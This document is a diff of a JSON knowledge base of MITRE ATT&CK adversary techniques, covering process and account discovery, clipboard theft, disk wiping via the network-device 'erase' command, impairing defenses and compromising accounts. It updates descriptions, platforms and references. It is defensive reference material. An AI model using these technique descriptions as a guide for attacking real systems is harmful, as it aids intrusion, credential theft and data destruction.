+ "description": "Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from [Process Discovery](https://attack.mitre.org/techniques/T1057) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nIn Windows environments, adversaries could obtain details on running processes using the [Tasklist](https://attack.mitre.org/software/S0057) utility via [cmd](https://attack.mitre.org/software/S0106) or Get-Process via [PowerShell](https://attack.mitre.org/techniques/T1059/001). Information about processes can also be extracted from the output of [Native API](https://attack.mitre.org/techniques/T1106) calls such as CreateToolhelp32Snapshot. In Mac and Linux, this is accomplished with the ps command. Adversaries may also opt to enumerate processes via /proc.\n\nOn network devices, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `show processes` can be used to display current running processes.(Citation: US-CERT-TA18-106A)(Citation: show_processes_cisco_cmd)",
"meta": {
"external_id": "T1057",
"kill_chain": [
@@ -24144,11 +24497,13 @@
"mitre_platforms": [
"Linux",
"macOS",
- "Windows"
+ "Windows",
+ "Network"
],
"refs": [
"https://attack.mitre.org/techniques/T1057",
- "https://capec.mitre.org/data/definitions/573.html"
+ "https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/fundamentals/command/cf_command_ref/show_monitor_permit_list_through_show_process_memory.html#wp3599497760",
+ "https://www.us-cert.gov/ncas/alerts/TA18-106A"
]
},
"uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
@@ -24186,7 +24541,7 @@
"value": "Stage Capabilities - T1608"
},
{
- "description": "Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.",
+ "description": "Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., [Valid Accounts](https://attack.mitre.org/techniques/T1078)).\n\nAdversaries may use several methods to enumerate accounts, including abuse of existing tools, built-in commands, and potential misconfigurations that leak account names and roles or permissions in the targeted environment.\n\nFor examples, cloud environments typically provide easily accessible interfaces to obtain user lists. On hosts, adversaries can use default [PowerShell](https://attack.mitre.org/techniques/T1059/001) and other command line functionality to identify accounts. Information about email addresses and accounts may also be extracted by searching an infected system’s files.",
"meta": {
"external_id": "T1087",
"kill_chain": [
@@ -24209,7 +24564,6 @@
],
"refs": [
"https://attack.mitre.org/techniques/T1087",
- "https://capec.mitre.org/data/definitions/575.html",
"https://www.elastic.co/blog/embracing-offensive-tooling-building-detections-against-koadic-using-eql"
]
},
@@ -24245,7 +24599,6 @@
],
"refs": [
"https://attack.mitre.org/techniques/T1078",
- "https://capec.mitre.org/data/definitions/560.html",
"https://technet.microsoft.com/en-us/library/dn487457.aspx",
"https://technet.microsoft.com/en-us/library/dn535501.aspx",
"https://www.cisa.gov/uscert/ncas/alerts/aa22-074a",
@@ -24310,7 +24663,8 @@
"Linux",
"macOS",
"Google Workspace",
- "SaaS"
+ "SaaS",
+ "Network"
],
"refs": [
"https://attack.mitre.org/techniques/T1098",
@@ -24344,7 +24698,6 @@
"refs": [
"https://attack.mitre.org/techniques/T1112",
"https://blog.trendmicro.com/trendlabs-security-intelligence/poweliks-malware-hides-in-windows-registry/",
- "https://capec.mitre.org/data/definitions/203.html",
"https://docs.microsoft.com/en-us/sysinternals/downloads/regdelnull",
"https://docs.microsoft.com/sysinternals/downloads/reghide",
"https://docs.microsoft.com/windows/security/threat-protection/auditing/event-4657",
@@ -24404,7 +24757,6 @@
"refs": [
"https://attack.mitre.org/techniques/T1113",
"https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/",
- "https://capec.mitre.org/data/definitions/648.html",
"https://docs.microsoft.com/en-us/dotnet/api/system.drawing.graphics.copyfromscreen?view=netframework-4.8"
]
},
@@ -24536,7 +24888,7 @@
"value": "Input Prompt - T1141"
},
{
- "description": "Adversaries may collect data stored in the clipboard from users copying information within or between applications. \n\nIn Windows, Applications can access clipboard data by using the Windows API.(Citation: MSDN Clipboard) OSX provides a native command, pbpaste, to grab clipboard contents.(Citation: Operating with EmPyre)",
+ "description": "Adversaries may collect data stored in the clipboard from users copying information within or between applications. \n\nFor example, on Windows adversaries can access clipboard data by using clip.exe or Get-Clipboard.(Citation: MSDN Clipboard)(Citation: clip_win_server)(Citation: CISA_AA21_200B) Additionally, adversaries may monitor then replace users’ clipboard with their data (e.g., [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002)).(Citation: mining_ruby_reversinglabs)\n\nmacOS and Linux also have commands, such as pbpaste, to grab clipboard contents.(Citation: Operating with EmPyre)",
"meta": {
"external_id": "T1115",
"kill_chain": [
@@ -24553,9 +24905,11 @@
],
"refs": [
"https://attack.mitre.org/techniques/T1115",
- "https://capec.mitre.org/data/definitions/637.html",
+ "https://blog.reversinglabs.com/blog/mining-for-malicious-ruby-gems",
+ "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/clip",
"https://medium.com/rvrsh3ll/operating-with-empyre-ea764eda3363",
- "https://msdn.microsoft.com/en-us/library/ms649012"
+ "https://msdn.microsoft.com/en-us/library/ms649012",
+ "https://www.cisa.gov/uscert/ncas/alerts/aa21-200b"
]
},
"uuid": "30973a08-aed9-4edf-8604-9084ce1b5c4f",
@@ -24694,8 +25048,7 @@
"Windows"
],
"refs": [
- "https://attack.mitre.org/techniques/T1123",
- "https://capec.mitre.org/data/definitions/634.html"
+ "https://attack.mitre.org/techniques/T1123"
]
},
"uuid": "1035cdf2-3e5f-446f-a7a7-e8f6d7925967",
@@ -24781,7 +25134,6 @@
],
"refs": [
"https://attack.mitre.org/techniques/T1125",
- "https://capec.mitre.org/data/definitions/634.html",
"https://objective-see.com/blog/blog_0x25.html"
]
},
@@ -24806,15 +25158,7 @@
"https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf"
]
},
- "related": [
- {
- "dest-uuid": "6747daa2-3533-4e78-8fb8-446ebb86448a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "revoked-by"
- }
- ],
+ "related": [],
"uuid": "36675cd3-fe00-454c-8516-aebecacbe9d9",
"value": "Login Item - T1162"
},
@@ -25025,7 +25369,8 @@
"IaaS",
"Linux",
"macOS",
- "Google Workspace"
+ "Google Workspace",
+ "Network"
],
"refs": [
"https://attack.mitre.org/techniques/T1136",
@@ -25466,7 +25811,7 @@
"value": "LC_MAIN Hijacking - T1149"
},
{
- "description": "Adversaries may wipe or corrupt raw disk data on specific systems or in large numbers in a network to interrupt availability to system and network resources. With direct write access to a disk, adversaries may attempt to overwrite portions of disk data. Adversaries may opt to wipe arbitrary portions of disk data and/or wipe disk structures like the master boot record (MBR). A complete wipe of all disk sectors may be attempted.\n\nTo maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware used for wiping disks may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Novetta Blockbuster Destructive Malware)",
+ "description": "Adversaries may wipe or corrupt raw disk data on specific systems or in large numbers in a network to interrupt availability to system and network resources. With direct write access to a disk, adversaries may attempt to overwrite portions of disk data. Adversaries may opt to wipe arbitrary portions of disk data and/or wipe disk structures like the master boot record (MBR). A complete wipe of all disk sectors may be attempted.\n\nTo maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware used for wiping disks may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Novetta Blockbuster Destructive Malware)\n\nOn network devices, adversaries may wipe configuration files and other data from the device using [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `erase`.(Citation: erase_cmd_cisco)",
"meta": {
"external_id": "T1561",
"kill_chain": [
@@ -25482,12 +25827,14 @@
"mitre_platforms": [
"Linux",
"macOS",
- "Windows"
+ "Windows",
+ "Network"
],
"refs": [
"https://attack.mitre.org/techniques/T1561",
"https://docs.microsoft.com/sysinternals/downloads/sysmon",
- "https://web.archive.org/web/20160303200515/https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf"
+ "https://web.archive.org/web/20160303200515/https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf",
+ "https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/fundamentals/command/cf_command_ref/D_through_E.html#wp3557227463"
]
},
"uuid": "1988cc35-ced8-4dad-b2d1-7628488fa967",
@@ -25617,8 +25964,7 @@
"Google Workspace"
],
"refs": [
- "https://attack.mitre.org/techniques/T1518",
- "https://capec.mitre.org/data/definitions/580.html"
+ "https://attack.mitre.org/techniques/T1518"
]
},
"uuid": "e3b6daca-e963-4a69-aee6-ed4fd653ad58",
@@ -26041,6 +26387,7 @@
"mitre-attack:credential-access"
],
"mitre_data_sources": [
+ "Application Log: Application Log Content",
"Command: Command Execution",
"File: File Access",
"Process: Process Creation",
@@ -26056,7 +26403,8 @@
"Linux",
"macOS",
"Google Workspace",
- "Containers"
+ "Containers",
+ "Network"
],
"refs": [
"https://attack.mitre.org/techniques/T1552"
@@ -26066,7 +26414,7 @@
"value": "Unsecured Credentials - T1552"
},
{
- "description": "Adversaries may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms. This not only involves impairing preventative defenses, such as firewalls and anti-virus, but also detection capabilities that defenders can use to audit activity and identify malicious behavior. This may also span both native defenses as well as supplemental capabilities installed by users and administrators.\n\nAdversaries could also target event aggregation and analysis mechanisms, or otherwise disrupt these procedures by altering other system components.",
+ "description": "Adversaries may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms. This not only involves impairing preventative defenses, such as firewalls and anti-virus, but also detection capabilities that defenders can use to audit activity and identify malicious behavior. This may also span both native defenses as well as supplemental capabilities installed by users and administrators.\n\nAdversaries may also impair routine operations that contribute to defensive hygiene, such as blocking users from logging out of a computer or stopping it from being shut down. These restrictions can further enable malicious operations as well as the continued propagation of incidents.(Citation: Emotet shutdown)\n\nAdversaries could also target event aggregation and analysis mechanisms, or otherwise disrupt these procedures by altering other system components.",
"meta": {
"external_id": "T1562",
"kill_chain": [
@@ -26084,6 +26432,7 @@
"Script: Script Execution",
"Sensor Health: Host Status",
"Service: Service Metadata",
+ "User Account: User Account Modification",
"Windows Registry: Windows Registry Key Deletion",
"Windows Registry: Windows Registry Key Modification"
],
@@ -26097,7 +26446,8 @@
"Network"
],
"refs": [
- "https://attack.mitre.org/techniques/T1562"
+ "https://attack.mitre.org/techniques/T1562",
+ "https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/#:~:text=Don’t%20Sleep%20has%20the%20capability%20to%20keep%20the%20computer%20from%20being%20shutdown%20and%20the%20user%20from%20being%20signed%20off.%20This%20was%20likely%20done%20to%20ensure%20nothing%20will%20interfere%20with%20the%20propagation%20of%20the%20ransomware%20payload"
]
},
"uuid": "3d333250-30e4-4a82-9edc-756c68afc529",
@@ -26326,7 +26676,7 @@
"value": "Encrypted Channel - T1573"
},
{
- "description": "Adversaries may buy, lease, or rent infrastructure that can be used during targeting. A wide variety of infrastructure exists for hosting and orchestrating adversary operations. Infrastructure solutions include physical or cloud servers, domains, and third-party web services.(Citation: TrendmicroHideoutsLease) Additionally, botnets are available for rent or purchase.\n\nUse of these infrastructure solutions allows an adversary to stage, launch, and execute an operation. Solutions may help adversary operations blend in with traffic that is seen as normal, such as contact to third-party web services. Depending on the implementation, adversaries may use infrastructure that makes it difficult to physically tie back to them as well as utilize infrastructure that can be rapidly provisioned, modified, and shut down.",
+ "description": "Adversaries may buy, lease, or rent infrastructure that can be used during targeting. A wide variety of infrastructure exists for hosting and orchestrating adversary operations. Infrastructure solutions include physical or cloud servers, domains, and third-party web services.(Citation: TrendmicroHideoutsLease) Additionally, botnets are available for rent or purchase.\n\nUse of these infrastructure solutions allows adversaries to stage, launch, and execute operations. Solutions may help adversary operations blend in with traffic that is seen as normal, such as contacting third-party web services or acquiring infrastructure to support [Proxy](https://attack.mitre.org/techniques/T1090).(Citation: amnesty_nso_pegasus) Depending on the implementation, adversaries may use infrastructure that makes it difficult to physically tie back to them as well as utilize infrastructure that can be rapidly provisioned, modified, and shut down.",
"meta": {
"external_id": "T1583",
"kill_chain": [
@@ -26347,6 +26697,7 @@
"https://documents.trendmicro.com/assets/wp/wp-criminal-hideouts-for-lease.pdf",
"https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2",
"https://threatconnect.com/blog/infrastructure-research-hunting/",
+ "https://www.amnesty.org/en/latest/research/2021/07/forensic-methodology-report-how-to-catch-nso-groups-pegasus/",
"https://www.mandiant.com/resources/scandalous-external-detection-using-network-scan-data-and-automation"
]
},
@@ -26443,7 +26794,7 @@
"value": "Hide Artifacts - T1564"
},
{
- "description": "Adversaries may compromise third-party infrastructure that can be used during targeting. Infrastructure solutions include physical or cloud servers, domains, and third-party web and DNS services. Instead of buying, leasing, or renting infrastructure an adversary may compromise infrastructure and use it during other phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: ICANNDomainNameHijacking)(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye EPS Awakens Part 2) Additionally, adversaries may compromise numerous machines to form a botnet they can leverage.\n\nUse of compromised infrastructure allows an adversary to stage, launch, and execute an operation. Compromised infrastructure can help adversary operations blend in with traffic that is seen as normal, such as contact with high reputation or trusted sites. For example, adversaries may leverage compromised infrastructure (potentially also in conjunction with [Digital Certificates](https://attack.mitre.org/techniques/T1588/004)) to further blend in and support staged information gathering and/or [Phishing](https://attack.mitre.org/techniques/T1566) campaigns.(Citation: FireEye DNS Hijack 2019) \n\nBy using compromised infrastructure, adversaries may make it difficult to tie their actions back to them. Prior to targeting, adversaries may compromise the infrastructure of other adversaries.(Citation: NSA NCSC Turla OilRig)",
+ "description": "Adversaries may compromise third-party infrastructure that can be used during targeting. Infrastructure solutions include physical or cloud servers, domains, and third-party web and DNS services. Instead of buying, leasing, or renting infrastructure an adversary may compromise infrastructure and use it during other phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: ICANNDomainNameHijacking)(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye EPS Awakens Part 2) Additionally, adversaries may compromise numerous machines to form a botnet they can leverage.\n\nUse of compromised infrastructure allows adversaries to stage, launch, and execute operations. Compromised infrastructure can help adversary operations blend in with traffic that is seen as normal, such as contact with high reputation or trusted sites. For example, adversaries may leverage compromised infrastructure (potentially also in conjunction with [Digital Certificates](https://attack.mitre.org/techniques/T1588/004)) to further blend in and support staged information gathering and/or [Phishing](https://attack.mitre.org/techniques/T1566) campaigns.(Citation: FireEye DNS Hijack 2019) Additionally, adversaries may also compromise infrastructure to support [Proxy](https://attack.mitre.org/techniques/T1090).(Citation: amnesty_nso_pegasus)\n\nBy using compromised infrastructure, adversaries may make it difficult to tie their actions back to them. Prior to targeting, adversaries may compromise the infrastructure of other adversaries.(Citation: NSA NCSC Turla OilRig)",
"meta": {
"external_id": "T1584",
"kill_chain": [
@@ -26466,6 +26817,7 @@
"https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2",
"https://threatconnect.com/blog/infrastructure-research-hunting/",
"https://web.archive.org/web/20151226205946/https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html",
+ "https://www.amnesty.org/en/latest/research/2021/07/forensic-methodology-report-how-to-catch-nso-groups-pegasus/",
"https://www.fireeye.com/blog/threat-research/2019/01/global-dns-hijacking-campaign-dns-record-manipulation-at-scale.html",
"https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf",
"https://www.icann.org/groups/ssac/documents/sac-007-en",
@@ -26732,7 +27084,7 @@
"value": "Active Scanning - T1595"
},
{
- "description": "Adversaries may compromise accounts with services that can be used during targeting. For operations incorporating social engineering, the utilization of an online persona may be important. Rather than creating and cultivating accounts (i.e. [Establish Accounts](https://attack.mitre.org/techniques/T1585)), adversaries may compromise existing accounts. Utilizing an existing persona may engender a level of trust in a potential victim if they have a relationship, or knowledge of, the compromised persona. \n\nA variety of methods exist for compromising accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials from third-party sites, or by brute forcing credentials (ex: password reuse from breach credential dumps).(Citation: AnonHBGary) Prior to compromising accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation.\n\nPersonas may exist on a single site or across multiple sites (ex: Facebook, LinkedIn, Twitter, Google, etc.). Compromised accounts may require additional development, this could include filling out or modifying profile information, further developing social networks, or incorporating photos.\n\nAdversaries may directly leverage compromised email accounts for [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/T1566).",
+ "description": "Adversaries may compromise accounts with services that can be used during targeting. For operations incorporating social engineering, the utilization of an online persona may be important. Rather than creating and cultivating accounts (i.e. [Establish Accounts](https://attack.mitre.org/techniques/T1585)), adversaries may compromise existing accounts. Utilizing an existing persona may engender a level of trust in a potential victim if they have a relationship, or knowledge of, the compromised persona. \n\nA variety of methods exist for compromising accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials from third-party sites, brute forcing credentials (ex: password reuse from breach credential dumps), or paying employees, suppliers or business partners for access to credentials.(Citation: AnonHBGary)(Citation: Microsoft DEV-0537) Prior to compromising accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation.\n\nPersonas may exist on a single site or across multiple sites (ex: Facebook, LinkedIn, Twitter, Google, etc.). Compromised accounts may require additional development, this could include filling out or modifying profile information, further developing social networks, or incorporating photos.\n\nAdversaries may directly leverage compromised email accounts for [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/T1566).",
"meta": {
"external_id": "T1586",
"kill_chain": [
@@ -26747,7 +27099,8 @@
],
"refs": [
"https://arstechnica.com/tech-policy/2011/02/anonymous-speaks-the-inside-story-of-the-hbgary-hack/",
- "https://attack.mitre.org/techniques/T1586"
+ "https://attack.mitre.org/techniques/T1586",
+ "https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/"
]
},
"uuid": "81033c3b-16a4-46e4-8fed-9b030dd03c4a",
@@ -26912,7 +27265,6 @@
"https://arxiv.org/abs/1809.05681",
"https://attack.mitre.org/techniques/T1557",
"https://blog.netlab.360.com/ttint-an-iot-remote-control-trojan-spread-through-2-0-day-vulnerabilities/",
- "https://capec.mitre.org/data/definitions/94.html",
"https://securelist.com/ad-blocker-with-miner-included/101105/",
"https://tlseminar.github.io/downgrade-attacks/",
"https://www.praetorian.com/blog/man-in-the-middle-tls-ssl-protocol-downgrade-attack/",
@@ -27135,7 +27487,6 @@
],
"refs": [
"https://attack.mitre.org/techniques/T1021/004",
- "https://capec.mitre.org/data/definitions/555.html",
"https://sarah-edwards-xzkc.squarespace.com/blog/2020/4/30/analysis-of-apple-unified-logs-quarantine-edition-entry-6-working-from-home-remote-logins"
]
},
@@ -27168,7 +27519,6 @@
"refs": [
"http://lists.openstack.org/pipermail/openstack/2013-December/004138.html",
"https://attack.mitre.org/techniques/T1021/005",
- "https://capec.mitre.org/data/definitions/555.html",
"https://datatracker.ietf.org/doc/html/rfc6143#section-7.2.2",
"https://gitlab.gnome.org/GNOME/gnome-remote-desktop/-/blob/9aa9181e/src/grd-settings.c#L207",
"https://gitlab.gnome.org/GNOME/gnome-remote-desktop/-/blob/9aa9181e/src/org.gnome.desktop.remote-desktop.gschema.xml.in",
@@ -27268,7 +27618,6 @@
"refs": [
"http://opensecuritytraining.info/Keylogging_files/The%20Adventures%20of%20a%20Keystroke.pdf",
"https://attack.mitre.org/techniques/T1056/001",
- "https://capec.mitre.org/data/definitions/568.html",
"https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954"
]
},
@@ -27300,13 +27649,13 @@
],
"refs": [
"http://www.malwarearchaeology.com/s/Windows-PowerShell-Logging-Cheat-Sheet-ver-June-2016-v2.pdf",
- "http://www.sixdub.net/?p=367",
"https://attack.mitre.org/techniques/T1059/001",
"https://blogs.msdn.microsoft.com/kebab/2014/04/28/executing-powershell-scripts-from-c/",
"https://github.com/jaredhaight/PSAttack",
"https://powershellmagazine.com/2014/07/16/investigating-powershell-attacks/",
- "https://silentbreaksecurity.com/powershell-jobs-without-powershell-exe/",
"https://technet.microsoft.com/en-us/scriptcenter/dd742419.aspx",
+ "https://web.archive.org/web/20160327101330/http://www.sixdub.net/?p=367",
+ "https://web.archive.org/web/20190508170150/https://silentbreaksecurity.com/powershell-jobs-without-powershell-exe/",
"https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html"
]
},
@@ -27377,7 +27726,6 @@
],
"refs": [
"https://attack.mitre.org/techniques/T1027/003",
- "https://capec.mitre.org/data/definitions/636.html",
"https://en.wikipedia.org/wiki/Duqu",
"https://securingtomorrow.mcafee.com/mcafee-labs/malicious-document-targets-pyeongchang-olympics/"
]
@@ -27500,12 +27848,7 @@
"https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf"
]
},
- "related": [
- {
- "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9",
- "type": "subtechnique-of"
- }
- ],
+ "related": [],
"uuid": "8faedf87-dceb-4c35-b2a2-7286f59a3bc3",
"value": "Launchd - T1053.004"
},
@@ -28018,18 +28361,17 @@
"https://attack.mitre.org/techniques/T1583/001",
"https://blog.talosintelligence.com/2021/05/transparent-tribe-infra-and-targeting.html",
"https://blog.talosintelligence.com/2022/03/transparent-tribe-new-campaign.html",
- "https://capec.mitre.org/data/definitions/630.html",
"https://krebsonsecurity.com/2018/11/that-domain-you-forgot-to-renew-yeah-its-now-stealing-credit-cards/",
"https://threatconnect.com/blog/infrastructure-research-hunting/",
"https://us-cert.cisa.gov/ncas/alerts/aa20-258a",
"https://us-cert.cisa.gov/ncas/tips/ST05-016",
+ "https://web.archive.org/web/20151022204649/https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf",
+ "https://web.archive.org/web/20171223000420/https://www.riskiq.com/blog/labs/lazarus-group-cryptocurrency/",
+ "https://web.archive.org/web/20220527112908/https://www.riskiq.com/blog/labs/ukraine-malware-infrastructure/",
"https://www.blackhillsinfosec.com/bypass-web-proxy-filtering/",
"https://www.cobaltstrike.com/blog/high-reputation-redirectors-and-domain-fronting/",
- "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf",
"https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf",
"https://www.mdsec.co.uk/2017/07/categorisation-is-not-a-security-boundary/",
- "https://www.riskiq.com/blog/labs/lazarus-group-cryptocurrency/",
- "https://www.riskiq.com/blog/labs/ukraine-malware-infrastructure/",
"https://www.zdnet.com/article/paypal-alert-beware-the-paypai-scam-5000109103/"
]
},
@@ -28043,7 +28385,7 @@
"value": "Domains - T1583.001"
},
{
- "description": "Adversaries may hijack domains and/or subdomains that can be used during targeting. Domain registration hijacking is the act of changing the registration of a domain name without the permission of the original registrant.(Citation: ICANNDomainNameHijacking) Adversaries may gain access to an email account for the person listed as the owner of the domain. The adversary can then claim that they forgot their password in order to make changes to the domain registration. Other possibilities include social engineering a domain registration help desk to gain access to an account or taking advantage of renewal process gaps.(Citation: Krebs DNS Hijack 2019)\n\nSubdomain hijacking can occur when organizations have DNS entries that point to non-existent or deprovisioned resources. In such cases, an adversary may take control of a subdomain to conduct operations with the benefit of the trust associated with that domain.(Citation: Microsoft Sub Takeover 2020)",
+ "description": "Adversaries may hijack domains and/or subdomains that can be used during targeting. Domain registration hijacking is the act of changing the registration of a domain name without the permission of the original registrant.(Citation: ICANNDomainNameHijacking) Adversaries may gain access to an email account for the person listed as the owner of the domain. The adversary can then claim that they forgot their password in order to make changes to the domain registration. Other possibilities include social engineering a domain registration help desk to gain access to an account or taking advantage of renewal process gaps.(Citation: Krebs DNS Hijack 2019)\n\nSubdomain hijacking can occur when organizations have DNS entries that point to non-existent or deprovisioned resources. In such cases, an adversary may take control of a subdomain to conduct operations with the benefit of the trust associated with that domain.(Citation: Microsoft Sub Takeover 2020)\n\nAdversaries who compromise a domain may also engage in domain shadowing by creating malicious subdomains under their control while keeping any existing DNS records. As service will not be disrupted, the malicious subdomains may go unnoticed for long periods of time.(Citation: Palo Alto Unit 42 Domain Shadowing 2022)",
"meta": {
"external_id": "T1584.001",
"kill_chain": [
@@ -28061,6 +28403,7 @@
"https://attack.mitre.org/techniques/T1584/001",
"https://docs.microsoft.com/en-us/azure/security/fundamentals/subdomain-takeover",
"https://krebsonsecurity.com/2019/02/a-deep-dive-on-the-recent-widespread-dns-hijacking-attacks/",
+ "https://unit42.paloaltonetworks.com/domain-shadowing/",
"https://www.icann.org/groups/ssac/documents/sac-007-en"
]
},
@@ -28231,7 +28574,7 @@
"value": "Malware - T1588.001"
},
{
- "description": "Adversaries may gather credentials that can be used during targeting. Account credentials gathered by adversaries may be those directly associated with the target victim organization or attempt to take advantage of the tendency for users to use the same passwords across personal and business accounts.\n\nAdversaries may gather credentials from potential victims in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect website authentication cookies from visitors.(Citation: ATT ScanBox) Credential information may also be exposed to adversaries via leaks to online or other accessible data sets (ex: [Search Engines](https://attack.mitre.org/techniques/T1593/002), breach dumps, code repositories, etc.).(Citation: Register Deloitte)(Citation: Register Uber)(Citation: Detectify Slack Tokens)(Citation: Forbes GitHub Creds)(Citation: GitHub truffleHog)(Citation: GitHub Gitrob)(Citation: CNET Leaks) Adversaries may also purchase credentials from dark web or other black-markets. Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).",
+ "description": "Adversaries may gather credentials that can be used during targeting. Account credentials gathered by adversaries may be those directly associated with the target victim organization or attempt to take advantage of the tendency for users to use the same passwords across personal and business accounts.\n\nAdversaries may gather credentials from potential victims in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then add malicious content designed to collect website authentication cookies from visitors.(Citation: ATT ScanBox) Credential information may also be exposed to adversaries via leaks to online or other accessible data sets (ex: [Search Engines](https://attack.mitre.org/techniques/T1593/002), breach dumps, code repositories, etc.).(Citation: Register Deloitte)(Citation: Register Uber)(Citation: Detectify Slack Tokens)(Citation: Forbes GitHub Creds)(Citation: GitHub truffleHog)(Citation: GitHub Gitrob)(Citation: CNET Leaks) Adversaries may also purchase credentials from dark web or other black-markets. Finally, where multi-factor authentication (MFA) based on out-of-band communications is in use, adversaries may compromise a service provider to gain access to MFA codes and one-time passwords (OTP).(Citation: Okta Scatter Swine 2022)\n\nGathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)). ",
"meta": {
"external_id": "T1589.001",
"kill_chain": [
@@ -28246,6 +28589,7 @@
"https://github.com/dxa4481/truffleHog",
"https://github.com/michenriksen/gitrob",
"https://labs.detectify.com/2016/04/28/slack-bot-token-leakage-exposing-business-critical-information/",
+ "https://sec.okta.com/scatterswine",
"https://www.cnet.com/news/massive-breach-leaks-773-million-emails-21-million-passwords/",
"https://www.forbes.com/sites/runasandvik/2014/01/14/attackers-scrape-github-for-cloud-service-credentials-hijack-account-to-mine-virtual-currency/#242c479d3196",
"https://www.theregister.com/2015/02/28/uber_subpoenas_github_for_hacker_details/",
@@ -28307,7 +28651,6 @@
"refs": [
"http://www.symantec.com/connect/blogs/are-mbr-infections-back-fashion",
"https://attack.mitre.org/techniques/T1542/003",
- "https://capec.mitre.org/data/definitions/552.html",
"https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/rpt-mtrends-2016.pdf"
]
},
@@ -28459,7 +28802,7 @@
"value": "Tool - T1588.002"
},
{
- "description": "Adversaries may buy, lease, or rent physical servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, including for Command and Control. Instead of compromising a third-party [Server](https://attack.mitre.org/techniques/T1584/004) or renting a [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003), adversaries may opt to configure and run their own servers in support of operations.\n\nAdversaries may only need a lightweight setup if most of their activities will take place using online infrastructure. Or, they may need to build extensive infrastructure if they want to test, communicate, and control other aspects of their activities on their own systems.(Citation: NYTStuxnet)",
